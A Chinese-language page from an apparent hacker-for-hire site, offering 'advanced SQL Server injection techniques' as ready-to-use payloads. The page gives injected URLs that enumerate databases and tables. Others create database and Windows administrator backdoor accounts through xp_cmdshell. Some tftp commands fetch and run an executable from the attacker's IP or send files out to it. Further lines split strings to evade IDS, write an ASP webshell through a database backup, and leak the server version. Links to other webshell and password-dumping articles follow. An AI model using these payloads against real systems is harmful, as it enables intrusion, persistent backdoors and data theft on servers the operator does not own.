找黑客平台

SQLSERVER高级注入技巧

hacker5年前黑客文章688

前言:
即是高级技巧,其它基本的注入 *** 就不详述了。
看不懂可查本站的注入基础文章。
为了更好的用好注入,建议大家看看本站的SQL语法相关文章

[获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库

[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and status>0 and name not in('table')

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]

通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将系统用户test提升为管理员

这样,你在他的数据库和系统内都留下了test管理员账号了

下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器,将69端口打开]

id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--

然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell 'file.exe';--

下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:

id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--

绕过IDS的检测[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

新加的:

建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk='d:\web\db.asp';

报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@VERSION);

标签: 黑客技术
返回列表

上一篇:ECshop商城系统后台拿webshell方法

下一篇:dedecms找后台和解密注意事项

相关文章

史上最全Linux提权后获取敏感信息方法

在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我...

OpenVAS是一个完全免费的漏洞检测程序流程

OpenVAS是一个完全免费的漏洞检测程序流程

什么叫OpenVAS? OpenVas是一个完全免费的漏洞检测程序流程,该专用工具在2006年的专用工具合理合法后才从最后一个漏洞检测程序流程(Nessus)的完全免费版本号中删掉。OpenVAS的...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Snort? Snort是由Martin Roesch建立的开源系统互联网入侵防御系统系统软件(NIDS)和互联网侵入防护系统(NIPS)。自2014年至今,Snort已由思科交换机全部。Sn...

Ewebeidtor编辑器漏洞

Ewebeidtor编辑器漏洞

一、Ewebeidtor编辑器漏洞 eWebEditor是根据电脑浏览器的、眼见为实的线上HTML在线编辑器。它可以在网页页面上完成很多桌面上编辑软件(如:Word)所具备的强劲可视性编写作用。 &...

dedecms注入爆管理员用户密码方法

关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号:...

帝国cms后台拿shell两种方法

第一种方法:  增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.